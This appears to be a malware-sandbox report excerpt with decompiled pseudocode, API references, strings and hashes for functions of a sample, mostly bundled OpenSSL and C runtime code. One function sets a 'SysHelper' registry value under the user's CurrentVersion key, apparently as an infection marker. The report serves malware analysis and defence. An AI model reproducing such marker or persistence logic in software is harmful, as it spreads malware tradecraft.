							E004512D0(__ebx, _t38, _t39, __ebp, _t60, 9, 0x6b, 0x6b, ".\\crypto\\pem\\pem_lib.c", 0x1f4);
							L5:
							return 0;
						}
					}
				}
				L27:
			}

0x00463350
0x00463350
0x00463350
0x00463351
0x00463356
0x0046335a
0x00463362
0x004634c7
0x004634cd
0x00463368
0x00463368
0x0046336c
0x00000000
0x0046337a
0x00463382
0x0046338a
0x0046338c
0x004633ab
0x004633af
0x00000000
0x004633b1
0x004633b1
0x004633b5
0x00000000
0x004633b7
0x004633b9
0x004633ca
0x004633cc
0x004633eb
0x004633ed
0x004633ef
0x004633fd
0x004633fd
0x00463400
0x00463421
0x00463430
0x00463432
0x00463451
0x00463451
0x00463454
0x00463456
0x00463457
0x00463457
0x00463459
0x0046345c
0x00000000
0x00000000
0x0046345e
0x00463461
0x0046346f
0x0046346f
0x00000000
0x0046346f
0x00463463
0x00463463
0x00463466
0x00000000
0x00000000
0x00463468
0x0046346b
0x0046346d
0x00000000
0x00000000
0x00463473
0x00463476
0x0046347e
0x00463480
0x00463483
0x00463487
0x00463488
0x0046348a
0x004634b5
0x004634bf
0x004634c5
0x0046348c
0x0046349c
0x004634a4
0x004634a8
0x004634a8
0x00000000
0x0046348a
0x00463434
0x00463444
0x0046344c
0x00463450
0x00463450
0x00000000
0x00000000
0x00000000
0x004633f1
0x004633f1
0x004633f1
0x004633f3
0x00000000
0x00000000
0x004633f5
0x004633f8
0x004633f9
0x004633fb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004633fb
0x00463402
0x00463412
0x0046341a
0x0046341e
0x0046341e
0x004633ce
0x004633de
0x004633e6
0x004633ea
0x004633ea
0x004633cc
0x004633b5
0x0046338e
0x0046339e
0x004633a7
0x004633aa
0x004633aa
0x0046338c
0x0046336c
0x00000000

APIs

_strncmp.LIBCMT ref: 00463382
_strncmp.LIBCMT ref: 004633C2

Strings

Proc-Type: , xrefs: 0046337C
ENCRYPTED, xrefs: 004633BC
DEK-Info: , xrefs: 00463422
.\crypto\pem\pem_lib.c, xrefs: 00463393, 004633D3, 00463407, 00463439, 00463491

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
API String ID: 909875538-2908105608
Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F

Uniqueness

Uniqueness Score: -1.00%

Function 004C5D39 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004C5D39(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v32;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				signed int _t32;
				signed int* _t34;
				signed int _t36;
				signed int _t42;
				signed int _t47;
				char* _t48;
				signed int _t49;
				signed int _t52;
				unsigned int _t58;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t66;
				signed int _t73;
				void* _t78;
				char* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t83;
				void* _t89;
				void* _t93;

				_t63 = __edx;
				_t89 = _t93;
				_t78 = E0042501F(__ebx);
				if(_t78 != 0) {
					_push(__ebx);
					__eflags =  *(_t78 + 0x24);
					if( *(_t78 + 0x24) != 0) {
						L7:
						_t79 =  *(_t78 + 0x24);
						_t32 = E0042C0FD(_t79, 0x86, E004C5D13(_a4));
						__eflags = _t32;
						if(_t32 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E004242FD(0x86, _t63);
							asm("int3");
							_push(_t89);
							__eflags = _v32;
							_push(_t79);
							if(__eflags != 0) {
								_t80 = _v16;
								__eflags = _t80;
								if(__eflags == 0) {
									goto L10;
								} else {
									_t7 = _t80 - 1; // -1
									_t36 = E0043FF8E(_v20, _t80, E004C5D13(_v12), _t7);
									__eflags = _t36;
									if(_t36 == 0) {
										goto L11;
									} else {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E004242FD(0x86, _t63);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t58 = _v52;
										_push(0);
										__eflags = _t58;
										if(_t58 == 0) {
											L34:
											return _v60;
										} else {
											_push(_t80);
											_push(0x86);
											_t52 = _t58;
											_t83 = _v56;
											__eflags = _t83 & 0x00000003;
											_t73 = _v60;
											if((_t83 & 0x00000003) != 0) {
												while(1) {
													_t42 =  *_t83;
													_t83 = _t83 + 1;
													 *_t73 = _t42;
													_t73 = _t73 + 1;
													_t58 = _t58 - 1;
													__eflags = _t58;
													if(_t58 == 0) {
														goto L26;
													}
													__eflags = _t42;
													if(_t42 == 0) {
														__eflags = _t73 & 0x00000003;
														if((_t73 & 0x00000003) == 0) {
															L30:
															_t52 = _t58;
															_t59 = _t58 >> 2;
															__eflags = _t59;
															if(_t59 != 0) {
																goto L46;
															} else {
																goto L31;
															}
														} else {
															while(1) {
																 *_t73 = _t42;
																_t73 = _t73 + 1;
																_t58 = _t58 - 1;
																__eflags = _t58;
																if(_t58 == 0) {
																	goto L49;
																}
																__eflags = _t73 & 0x00000003;
																if((_t73 & 0x00000003) != 0) {
																	continue;
																} else {
																	goto L30;
																}
																goto L50;
															}
															goto L49;
														}
													} else {
														__eflags = _t83 & 0x00000003;
														if((_t83 & 0x00000003) != 0) {
															continue;
														} else {
															_t52 = _t58;
															_t60 = _t58 >> 2;
															__eflags = _t60;
															if(_t60 != 0) {
																goto L36;
															} else {
																goto L23;
															}
														}
													}
													goto L50;
												}
												goto L26;
											} else {
												_t60 = _t58 >> 2;
												__eflags = _t60;
												if(_t60 != 0) {
													do {
														L36:
														_t47 =  *_t83 ^ 0xffffffff ^ 0x7efefeff +  *_t83;
														_t66 =  *_t83;
														_t83 = _t83 + 4;
														__eflags = _t47 & 0x81010100;
														if((_t47 & 0x81010100) == 0) {
															goto L35;
														} else {
															__eflags = _t66;
															if(_t66 == 0) {
																__eflags = 0;
																 *_t73 = 0;
																goto L45;
															} else {
																__eflags = _t66;
																if(_t66 == 0) {
																	 *_t73 = _t66 & 0x000000ff;
																	goto L45;
																} else {
																	__eflags = _t66 & 0x00ff0000;
																	if((_t66 & 0x00ff0000) == 0) {
																		 *_t73 = _t66 & 0x0000ffff;
																		goto L45;
																	} else {
																		__eflags = _t66 & 0xff000000;
																		if((_t66 & 0xff000000) != 0) {
																			goto L35;
																		} else {
																			 *_t73 = _t66;
																			L45:
																			_t73 = _t73 + 4;
																			_t42 = 0;
																			_t59 = _t60 - 1;
																			__eflags = _t59;
																			if(_t59 != 0) {
																				L46:
																				_t42 = 0;
																				__eflags = 0;
																				do {
																					 *_t73 = 0;
																					_t73 = _t73 + 4;
																					_t59 = _t59 - 1;
																					__eflags = _t59;
																				} while (_t59 != 0);
																			}
																			_t52 = _t52 & 0x00000003;
																			__eflags = _t52;
																			if(_t52 != 0) {
																				goto L31;
																			} else {
																				L49:
																				return _v60;
																			}
																		}
																	}
																}
															}
														}
														goto L50;
														L35:
														 *_t73 = _t66;
														_t73 = _t73 + 4;
														_t60 = _t60 - 1;
														__eflags = _t60;
													} while (_t60 != 0);
													L23:
													_t52 = _t52 & 0x00000003;
													__eflags = _t52;
													if(_t52 == 0) {
														goto L26;
													} else {
														goto L24;
													}
												} else {
													while(1) {
														L24:
														_t42 =  *_t83;
														_t83 = _t83 + 1;
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t42;
														if(_t42 == 0) {
															break;
														}
														_t52 = _t52 - 1;
														__eflags = _t52;
														if(_t52 != 0) {
															continue;
														} else {
															L26:
															return _v60;
														}
														goto L50;
													}
													L32:
													_t52 = _t52 - 1;
													__eflags = _t52;
													if(_t52 != 0) {
														L31:
														 *_t73 = _t42;
														_t73 = _t73 + 1;
														__eflags = _t73;
														goto L32;
													}
													goto L34;
												}
											}
										}
									}
								}
							} else {
								L10:
								_t34 = E00425208(__eflags);
								_t81 = 0x16;
								 *_t34 = _t81;
								E004242D2();
								_t36 = _t81;
								L11:
								return _t36;
							}
						} else {
							_t48 = _t79;
							goto L5;
						}
					} else {
						_t49 = E00428C96(0x86, 1);
						 *(_t78 + 0x24) = _t49;
						__eflags = _t49;
						if(_t49 != 0) {
							goto L7;
						} else {
							_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
							L5:
							goto L6;
						}
					}
				} else {
					_t48 = "Visual C++ CRT: Not enough memory to complete call to strerror.";
					L6:
					return _t48;
				}
				L50:
			}

0x004c5d39
0x004c5d3a
0x004c5d42
0x004c5d46
0x004c5d4f
0x004c5d58
0x004c5d5b
0x004c5d78
0x004c5d7b
0x004c5d86
0x004c5d8e
0x004c5d90
0x004c5d96
0x004c5d97
0x004c5d98
0x004c5d99
0x004c5d9a
0x004c5d9b
0x004c5da0
0x004c5da1
0x004c5da4
0x004c5da8
0x004c5da9
0x004c5dbf
0x004c5dc2
0x004c5dc4
0x00000000
0x004c5dc6
0x004c5dc6
0x004c5dd8
0x004c5de0
0x004c5de2
0x00000000
0x004c5de4
0x004c5de6
0x004c5de7
0x004c5de8
0x004c5de9
0x004c5dea
0x004c5deb
0x004c5df0
0x004c5df1
0x004c5df2
0x004c5df3
0x004c5df4
0x004c5df5
0x004c5df6
0x004c5df7
0x004c5df8
0x004c5df9
0x004c5dfa
0x004c5dfb
0x004c5dfc
0x004c5dfd
0x004c5dfe
0x004c5dff
0x004c5e00
0x004c5e04
0x004c5e05
0x004c5e07
0x004c5e9f
0x004c5ea4
0x004c5e0d
0x004c5e0d
0x004c5e0e
0x004c5e0f
0x004c5e11
0x004c5e15
0x004c5e1b
0x004c5e1f
0x004c5e2c
0x004c5e2c
0x004c5e2e
0x004c5e31
0x004c5e33
0x004c5e36
0x004c5e36
0x004c5e39
0x00000000
0x00000000
0x004c5e3b
0x004c5e3d
0x004c5e6e
0x004c5e74
0x004c5e8c
0x004c5e8c
0x004c5e8e
0x004c5e8e
0x004c5e91
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e76
0x004c5e76
0x004c5e76
0x004c5e78
0x004c5e7b
0x004c5e7b
0x004c5e7e
0x00000000
0x00000000
0x004c5e84
0x004c5e8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e8a
0x00000000
0x004c5e76
0x004c5e3f
0x004c5e3f
0x004c5e45
0x00000000
0x004c5e47
0x004c5e47
0x004c5e49
0x004c5e49
0x004c5e4c
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e4c
0x004c5e45
0x00000000
0x004c5e3d
0x00000000
0x004c5e21
0x004c5e21
0x004c5e21
0x004c5e24
0x004c5eaf
0x004c5eaf
0x004c5ebb
0x004c5ebd
0x004c5ebf
0x004c5ec2
0x004c5ec7
0x00000000
0x004c5ec9
0x004c5ec9
0x004c5ecb
0x004c5ef9
0x004c5efb
0x00000000
0x004c5ecd
0x004c5ecd
0x004c5ecf
0x004c5ef5
0x00000000
0x004c5ed1
0x004c5ed1
0x004c5ed7
0x004c5eeb
0x00000000
0x004c5ed9
0x004c5ed9
0x004c5edf
0x00000000
0x004c5ee1
0x004c5ee1
0x004c5efd
0x004c5efd
0x004c5f00
0x004c5f02
0x004c5f02
0x004c5f05
0x004c5f07
0x004c5f07
0x004c5f07
0x004c5f09
0x004c5f09
0x004c5f0b
0x004c5f0e
0x004c5f0e
0x004c5f0e
0x004c5f09
0x004c5f13
0x004c5f13
0x004c5f16
0x00000000
0x004c5f1c
0x004c5f1c
0x004c5f23
0x004c5f23
0x004c5f16
0x004c5edf
0x004c5ed7
0x004c5ecf
0x004c5ecb
0x00000000
0x004c5ea5
0x004c5ea5
0x004c5ea7
0x004c5eaa
0x004c5eaa
0x004c5eaa
0x004c5e4e
0x004c5e4e
0x004c5e4e
0x004c5e51
0x00000000
0x00000000
0x00000000
0x00000000
0x004c5e2a
0x004c5e53
0x004c5e53
0x004c5e53
0x004c5e55
0x004c5e58
0x004c5e5a
0x004c5e5d
0x004c5e5f
0x00000000
0x00000000
0x004c5e61
0x004c5e61
0x004c5e64
0x00000000
0x004c5e66
0x004c5e66
0x004c5e6d
0x004c5e6d
0x00000000
0x004c5e64
0x004c5e98
0x004c5e98
0x004c5e98
0x004c5e9b
0x004c5e93
0x004c5e93
0x004c5e95
0x004c5e95
0x00000000
0x004c5e95
0x00000000
0x004c5e9e
0x004c5e24
0x004c5e1f
0x004c5e07
0x004c5de2
0x004c5dab
0x004c5dab
0x004c5dab
0x004c5db2
0x004c5db3
0x004c5db5
0x004c5dba
0x004c5dbc
0x004c5dbe
0x004c5dbe
0x004c5d92
0x004c5d92
0x00000000
0x004c5d92
0x004c5d5d
0x004c5d60
0x004c5d65
0x004c5d6a
0x004c5d6c
0x00000000
0x004c5d6e
0x004c5d6e
0x004c5d73
0x00000000
0x004c5d74
0x004c5d6c
0x004c5d48
0x004c5d48
0x004c5d75
0x004c5d77
0x004c5d77
0x00000000

APIs

__getptd_noexit.LIBCMT ref: 004C5D3D

Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083

__calloc_crt.LIBCMT ref: 004C5D60
__get_sys_err_msg.LIBCMT ref: 004C5D7E
__invoke_watson.LIBCMT ref: 004C5D9B
__get_sys_err_msg.LIBCMT ref: 004C5DCD
__invoke_watson.LIBCMT ref: 004C5DEB

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ErrorLast__calloc_crt__get_sys_err_msg__invoke_watson$CurrentThread__getptd_noexit__initptd
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 2139067377-798102604
Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6A0() {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _t16;

				_v8 = 0;
				_t16 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 0xf003f,  &_v8);
				if(_t16 != 0) {
					L4:
					return 1;
				} else {
					_v12 = _t16;
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"SysHelper", 0,  &_v20,  &_v12,  &_v16) != 0) {
						_v12 = 1;
						RegSetValueExW(_v8, L"SysHelper", 0, 4,  &_v12, 4);
						RegCloseKey(_v8);
						goto L4;
					} else {
						RegCloseKey(_v8);
						return 0;
					}
				}
			}

0x0040c6a9
0x0040c6c2
0x0040c6ca
0x0040c734
0x0040c739
0x0040c6cc
0x0040c6cc
0x0040c6d6
0x0040c6e1
0x0040c6fb
0x0040c711
0x0040c725
0x0040c72e
0x00000000
0x0040c6fd
0x0040c700
0x0040c70b
0x0040c70b
0x0040c6fb

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8
SysHelper, xrefs: 0040C6EB, 0040C71D

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Uniqueness

Uniqueness Score: -1.00%

Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E004573F0(signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, char _a28, signed int _a60, intOrPtr _a68, char _a72, signed int _a76, signed int _a80, signed int _a84, signed int _a88, intOrPtr _a92, signed int _a96, intOrPtr _a100, signed char _a104) {
				signed int _v0;
				signed int _v4;
				intOrPtr _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t129;
				intOrPtr _t135;
				signed int _t136;
				signed int _t140;
				void* _t141;
				signed int _t143;
				signed int _t148;
				void* _t150;
				intOrPtr _t154;
				signed char _t160;
				char _t166;
				intOrPtr _t170;
				signed int _t174;
				signed int _t181;
				signed int* _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				void* _t186;
				intOrPtr _t187;
				signed char _t189;
				signed int _t192;
				signed int* _t196;
				signed int _t199;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				void* _t208;
				intOrPtr _t209;
				signed int _t213;
				intOrPtr _t214;
				intOrPtr* _t217;
				signed int _t220;
				signed int _t221;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				intOrPtr* _t232;
				signed int* _t233;
				void* _t235;
				signed int _t240;
				void* _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr _t249;
				intOrPtr _t250;
				signed int _t253;
				signed int _t257;
				void* _t262;
				signed char _t268;

				E0042F7C0(0x40);
				_t129 =  *0x50ad20; // 0x4ea20c1c
				_a60 = _t129 ^ _t253;
				_t187 = _a100;
				_t181 = _a84;
				_t249 = _a68;
				_a28 = _a72;
				_a8 = _a76;
				_v0 = _a80;
				_t220 = 0;
				_a4 = 0x4ffca4;
				_a12 = 0;
				_t188 =  <  ? 0 : _t187;
				_t213 = _a88;
				_a100 =  <  ? 0 : _t187;
				_t189 = _a104;
				if((_t189 & 0x00000040) == 0) {
					_t257 = _t213;
					if(_t257 > 0 || _t257 >= 0 && _t181 >= 0) {
						__eflags = _t189 & 0x00000002;
						if((_t189 & 0x00000002) == 0) {
							__eflags = _t189 & 0x00000004;
							_a16 = 0x20;
							_t179 =  !=  ? _a16 : 0;
							_a12 =  !=  ? _a16 : 0;
						} else {
							_a12 = 0x2b;
						}
					} else {
						_t181 =  ~_t181;
						_a12 = 0x2d;
						asm("adc edx, eax");
						_t213 =  ~_t213;
					}
				}
				_t135 = _a92;
				if((_t189 & 0x00000008) != 0) {
					if(_t135 != 8) {
						__eflags = _a92 - 0x10;
						_t178 =  !=  ? 0x4ffca4 : "0x";
						_a4 =  !=  ? 0x4ffca4 : "0x";
						_t135 = _a92;
					} else {
						_a4 = "0";
					}
				}
				_a16 = "0123456789abcdef";
				_t230 =  !=  ? 1 : _t220;
				_t262 =  !=  ? 1 : _t220;
				_t192 =  ==  ? _a16 : "0123456789ABCDEF";
				_t231 = _t192;
				while(1) {
					_t136 = E0043AE20(_t181, _t213, _t135, 0);
					_a4 = _t181;
					_t181 = _t136;
					 *((char*)(_t253 + _t220 + 0x30)) =  *((intOrPtr*)(_t192 + _t231));
					_t220 = _t220 + 1;
					_t192 = _t181 | _t213;
					if(_t192 == 0) {
						break;
					}
					_t135 = _a92;
					if(_t220 < 0x1a) {
						continue;
					}
					break;
				}
				_t232 = _a4;
				_a16 = _t220;
				if(_t220 != 0x1a) {
					if(__eflags >= 0) {
						E0042AC83();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						E0042F7C0(4);
						_t140 = _a8;
						_t214 = 0;
						__eflags = _t140;
						_v16 = 0;
						_t196 =  !=  ? _t140 : "<NULL>";
						_t141 = 0;
						_a8 = _t196;
						__eflags =  *_t196;
						if( *_t196 != 0) {
							do {
								_t141 = _t141 + 1;
								__eflags =  *(_t141 + _t196);
							} while ( *(_t141 + _t196) != 0);
						}
						_t199 =  <  ? _t214 : _a16 - _t141;
						__eflags = _a12 & 0x00000001;
						_a16 = _t199;
						if((_a12 & 0x00000001) != 0) {
							_t199 =  ~_t199;
							_a16 = _t199;
						}
						_push(_t181);
						_t182 = _v0;
						_push(_t249);
						_t250 = _v8;
						_push(_t232);
						_t233 = _a4;
						_push(_t220);
						_t221 = _v4;
						__eflags = _t199;
						if(_t199 > 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L71;
								}
								__eflags = _t221;
								if(_t221 != 0) {
									__eflags =  *_t182 -  *_t233;
									if( *_t182 >=  *_t233) {
										do {
											__eflags =  *_t221;
											if( *_t221 != 0) {
												 *_t233 =  *_t233 + 0x400;
												__eflags =  *_t233;
												_t150 = E00454F30( *_t221,  *_t233, ".\\crypto\\bio\\b_print.c", 0x2ed);
												_t253 = _t253 + 0x10;
												 *_t221 = _t150;
											} else {
												__eflags =  *_t233;
												if( *_t233 == 0) {
													 *_t233 = 0x400;
												}
												 *_t221 = E00454E50( *_t233, ".\\crypto\\bio\\b_print.c", 0x2e5);
												_t253 = _t253 + 0xc;
												_t206 =  *_t182;
												__eflags = _t206;
												if(_t206 != 0) {
													E0042D8D0(_t152, _v0, _t206);
													_t253 = _t253 + 0xc;
												}
												_v0 = 0;
											}
											__eflags =  *_t182 -  *_t233;
										} while ( *_t182 >=  *_t233);
										_t214 = _v16;
									}
								}
								_t203 =  *_t182;
								__eflags = _t203 -  *_t233;
								if(_t203 <  *_t233) {
									_t148 = _v0;
									__eflags = _t148;
									if(_t148 == 0) {
										 *((char*)(_t203 +  *_t221)) = 0x20;
									} else {
										 *((char*)(_t148 + _t203)) = 0x20;
									}
									 *_t182 =  *_t182 + 1;
									__eflags =  *_t182;
								}
								_t214 = _t214 + 1;
								_t205 = _a16 - 1;
								_v16 = _t214;
								_a16 = _t205;
								__eflags = _t205;
								if(_t205 > 0) {
									continue;
								}
								goto L71;
							}
						}
						L71:
						_t200 = _a8;
						_t143 =  *_t200;
						__eflags = _t143;
						if(_t143 != 0) {
							_a8 = _t200 - _t214;
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L75;
								}
								E00456F70(_t250, _t221, _t182, _t233, _t143);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_v16 = _t214;
								_t143 =  *((intOrPtr*)(_a8 + _t214));
								__eflags = _t143;
								if(_t143 != 0) {
									continue;
								}
								goto L75;
							}
						}
						L75:
						__eflags = _a16;
						if(_a16 < 0) {
							while(1) {
								__eflags = _t214 - _a20;
								if(_t214 >= _a20) {
									goto L78;
								}
								_t143 = E00456F70(_t250, _t221, _t182, _t233, 0x20);
								_t253 = _t253 + 0x14;
								_t214 = _v16 + 1;
								_t124 =  &_a16;
								 *_t124 = _a16 + 1;
								__eflags =  *_t124;
								_v16 = _t214;
								if( *_t124 < 0) {
									continue;
								}
								goto L78;
							}
						}
						L78:
						return _t143;
					} else {
						goto L18;
					}
				} else {
					_t220 = 0x19;
					_a16 = 0x19;
					L18:
					_t184 = _a100;
					_t217 = _t232;
					 *((char*)(_t253 + _t220 + 0x30)) = 0;
					_t208 = _t184 - _t220;
					_t235 = _t217 + 1;
					do {
						_t154 =  *_t217;
						_t217 = _t217 + 1;
					} while (_t154 != 0);
					_t218 = _t217 - _t235;
					_t156 =  >=  ? _t184 : _t220;
					_t237 = _a96 - ( >=  ? _t184 : _t220);
					_t268 = _a12;
					_t238 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0);
					_t209 =  <  ? 0 : _t208;
					_t239 = _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_a24 = _t209;
					_t240 =  <  ? 0 : _a96 - ( >=  ? _t184 : _t220) - (_t268 != 0) - _t217 - _t235;
					_t160 = _a104;
					_a96 = _t240;
					if((_t160 & 0x00000010) != 0) {
						_t246 =  >=  ? _t209 : _t240;
						_a24 =  >=  ? _t209 : _t240;
						_t240 = 0;
						_a96 = 0;
					}
					if((_t160 & 0x00000001) != 0) {
						_t240 =  ~_t240;
						_a96 = _t240;
					}
					_t64 =  &_a28; // 0x456c55
					_t185 =  *_t64;
					if(_t240 > 0) {
						_t226 = _a8;
						do {
							E00456F70(_t249, _t185, _t226, _v0, 0x20);
							_t240 = _t240 - 1;
							_t253 = _t253 + 0x14;
						} while (_t240 > 0);
						_t220 = _a16;
						_a96 = _t240;
					}
					_t161 = _a12;
					if(_a12 != 0) {
						E00456F70(_t249, _t185, _a8, _v0, _t161);
						_t253 = _t253 + 0x14;
					}
					_t163 =  *_a4;
					if( *_a4 != 0) {
						_t245 = _a8;
						_t225 = _v0;
						do {
							E00456F70(_t249, _t185, _t245, _t225, _t163);
							_t253 = _t253 + 0x14;
							_t174 = _a4 + 1;
							_a4 = _t174;
							_t163 =  *_t174;
						} while ( *_t174 != 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_a24 > 0) {
						_t244 = _a8;
						_t224 = _v0;
						do {
							E00456F70(_t249, _t185, _t244, _t224, 0x30);
							_t253 = _t253 + 0x14;
							_t170 = _a24 - 1;
							_a24 = _t170;
						} while (_t170 > 0);
						_t240 = _a96;
						_t220 = _a16;
					}
					if(_t220 > 0) {
						_t243 = _a8;
						do {
							_t166 =  *((char*)(_t253 + _t220 + 0x2f));
							_t220 = _t220 - 1;
							E00456F70(_t249, _t185, _t243, _v0, _t166);
							_t253 = _t253 + 0x14;
						} while (_t220 > 0);
						_t240 = _a96;
					}
					if(_t240 < 0) {
						_t242 =  ~_t240;
						do {
							E00456F70(_t249, _t185, _a8, _v0, 0x20);
							_t253 = _t253 + 0x14;
							_t242 = _t242 - 1;
						} while (_t242 != 0);
					}
					_pop(_t223);
					_pop(_t241);
					_pop(_t186);
					return E0042A77E(_t186, _a60 ^ _t253, _t218, _t223, _t241);
				}
			}

0x004573f5
0x004573fa
0x00457401
0x0045740b
0x00457410
0x00457415
0x00457419
0x00457422
0x00457430
0x00457434
0x00457438
0x0045743e
0x00457442
0x00457445
0x00457449
0x0045744d
0x00457454
0x00457456
0x00457458
0x00457470
0x00457473
0x0045747f
0x00457482
0x0045748a
0x0045748f
0x00457475
0x00457475
0x00457475
0x00457460
0x00457460
0x00457462
0x0045746a
0x0045746c
0x0045746c
0x00457458
0x00457493
0x0045749a
0x0045749f
0x004574ac
0x004574b6
0x004574b9
0x004574bd
0x004574a1
0x004574a6
0x004574a6
0x0045749f
0x004574c4
0x004574d3
0x004574db
0x004574dd
0x004574e2
0x004574e4
0x004574e9
0x004574ee
0x004574f2
0x004574f7
0x004574fd
0x004574fe
0x00457500
0x00000000
0x00000000
0x00457502
0x00457509
0x00000000
0x00000000
0x00000000
0x00457509
0x0045750b
0x0045750f
0x00457516
0x00457523
0x0045769f
0x004576a4
0x004576a5
0x004576a6
0x004576a7
0x004576a8
0x004576a9
0x004576aa
0x004576ab
